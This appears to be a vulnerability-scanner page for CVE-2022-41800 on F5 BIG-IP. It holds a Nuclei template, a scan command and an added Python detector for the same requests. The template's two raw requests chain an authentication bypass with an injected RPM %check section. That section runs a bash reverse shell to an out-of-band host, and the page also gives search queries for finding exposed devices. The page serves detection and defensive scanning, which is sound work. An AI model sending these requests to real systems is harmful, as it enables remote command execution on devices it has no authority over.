F5 BIG-IP Appliance Mode - Command Injection
ID: CVE-2022-41800
Severity: high
Author: dwisiswant0
Tags: cve,cve2022,rce,f5,bigip,instrusive
Description

When running in Appliance mode, an authenticated user assigned the Administrator role may bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint.
YAML Source

```yaml
id: CVE-2022-41800

info:
  name: F5 BIG-IP Appliance Mode - Command Injection
  author: dwisiswant0
  severity: high
  description: |
    When running in Appliance mode, an authenticated user assigned the Administrator role may bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint.
  impact: |
    A successful exploit can allow the attacker to execute remote commands on server using authorization bypass (CVE-2022-1388).
  reference:
    - https://attackerkb.com/topics/ZClTQn4aG4/cve-2022-41800/rapid7-analysis
    - https://support.f5.com/csp/article/K97843387
    - https://support.f5.com/csp/article/K13325942
    - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
    - https://nvd.nist.gov/vuln/detail/cve-2022-41800
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
    cvss-score: 8.7
    cve-id: CVE-2022-41800
    cwe-id: CWE-77
    epss-score: 0.0109
    epss-percentile: 0.84818
    cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: f5
    product: big-ip_access_policy_manager
    shodan-query:
      - http.title:"big-ip®-+redirect" +"server"
      - http.html:"big-ip apm"
    fofa-query:
      - body="big-ip apm"
      - title="big-ip®-+redirect" +"server"
    google-query: intitle:"big-ip®-+redirect" +"server"
  tags: cve,cve2022,rce,f5,bigip,instrusive

variables:
  auth: "admin:{{rand_text_alpha(1)}}"
  rand_app: "{{to_lower(rand_text_alpha(6))}}"
  rand_ver: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}"
  rand_rel: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}"

http:
  - raw:
      - |
        POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1
        Host: {{Hostname}}
        X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}}
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json
        Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host

        {
          "specFileData": {
            "name": "{{rand_app}}",
            "srcBasePath": "/tmp",
            "version": "{{rand_ver}}",
            "release": "{{rand_rel}}",
            "description": "\n\n%check\nbash -i >& /dev/tcp/{{interactsh-url}}/{{rand_text_numeric(4)}} 0>&1",
            "summary": "{{to_lower(rand_text_alphanumeric(10))}}"
          }
        }

      - |
        POST /mgmt/shared/iapp/build-package HTTP/1.1
        Host: {{Hostname}}
        X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}}
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json
        Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host

        {
          "state": {},
          "appName": "{{rand_app}}",
          "packageDirectory": "/tmp",
          "specFilePath": "{{spec}}",
          "force": true
        }

    extractors:
      - type: json
        part: body
        name: spec
        json:
          - ".specFilePath"
        internal: true

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "RUN_BUILD_RPM_TASK"
          - "shared:iapp:build-package:buildrpmtaskstate"
# digest: 4a0a00473045022100a57e06512c7cc80aef74d56ff148ef58a0f939b086187a95fd62f41c7262294002203fef201e4c490cae24a33d78bc67b26465f0588c882a57e4af211ca22aafd40c:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

```shell
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-41800.yaml"
```
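As an added example (not part of the template or of the nuclei project), the following Python detector looks at the same two requests from the defender's side: it flags POSTs to the two iApp packaging endpoints whose spec fields carry an RPM scriptlet section, and the Connection header that strips X-F5-Auth-Token, which is the CVE-2022-1388 bypass the template chains. The request records are constructed, the capture source (a proxy, WAF or API audit log that retains bodies) is an assumption, and the extension to RPM sections other than %check is a generalisation of the page's single case.

```python
import json
import re

# Endpoints the template above drives (both taken from the page).
WATCHED_PATHS = {"/mgmt/shared/iapp/rpm-spec-creator", "/mgmt/shared/iapp/build-package"}
# RPM spec sections that rpmbuild executes as shell; the template abuses %check,
# the others are listed as a generalisation of the same injection point.
SCRIPTLET_RE = re.compile(r"^\s*%(prep|build|install|check|pre|post|preun|postun)\b", re.M)


def analyse_request(req: dict) -> list[str]:
    # `req` is a constructed record {"method", "path", "headers", "body"}; how such
    # records are captured on a real deployment is an assumption of this example.
    reasons: list[str] = []
    if req.get("method") != "POST" or req.get("path") not in WATCHED_PATHS:
        return reasons
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    # Naming X-F5-Auth-Token in Connection is the CVE-2022-1388 bypass the template chains.
    if "x-f5-auth-token" in headers.get("connection", "").lower():
        reasons.append("Connection header names X-F5-Auth-Token (CVE-2022-1388 pattern)")
    try:
        body = json.loads(req.get("body") or "{}")
    except json.JSONDecodeError:
        return reasons + ["non-JSON body sent to iApp packaging endpoint"]
    spec = body.get("specFileData") or {}
    for field in ("description", "summary", "name"):
        m = SCRIPTLET_RE.search(str(spec.get(field, "")))
        if m:
            reasons.append(f"RPM %{m.group(1)} section injected via specFileData.{field}")
    if body.get("force") is True and "specFilePath" in body:
        reasons.append("build-package forced from caller-supplied specFilePath")
    return reasons


# Constructed sample records, not real captures: one mirroring the template's first
# request (with a harmless command in place of the reverse shell), one benign build.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/mgmt/shared/iapp/rpm-spec-creator",
     "headers": {"Connection": "keep-alive, X-F5-Auth-Token, X-Forwarded-Host"},
     "body": json.dumps({"specFileData": {"name": "abcdef", "srcBasePath": "/tmp",
              "version": "1.2.3", "release": "4.5.6", "summary": "x",
              "description": "\n\n%check\necho injected"}})},
    {"method": "POST", "path": "/mgmt/shared/iapp/rpm-spec-creator",
     "headers": {"Connection": "keep-alive"},
     "body": json.dumps({"specFileData": {"name": "myapp", "description": "Legit iApp"}})},
]


def scan(requests: list[dict] = SAMPLE_REQUESTS) -> dict[int, list[str]]:
    # Map each record index to its findings; an empty list means nothing was flagged.
    return {i: analyse_request(r) for i, r in enumerate(requests)}
```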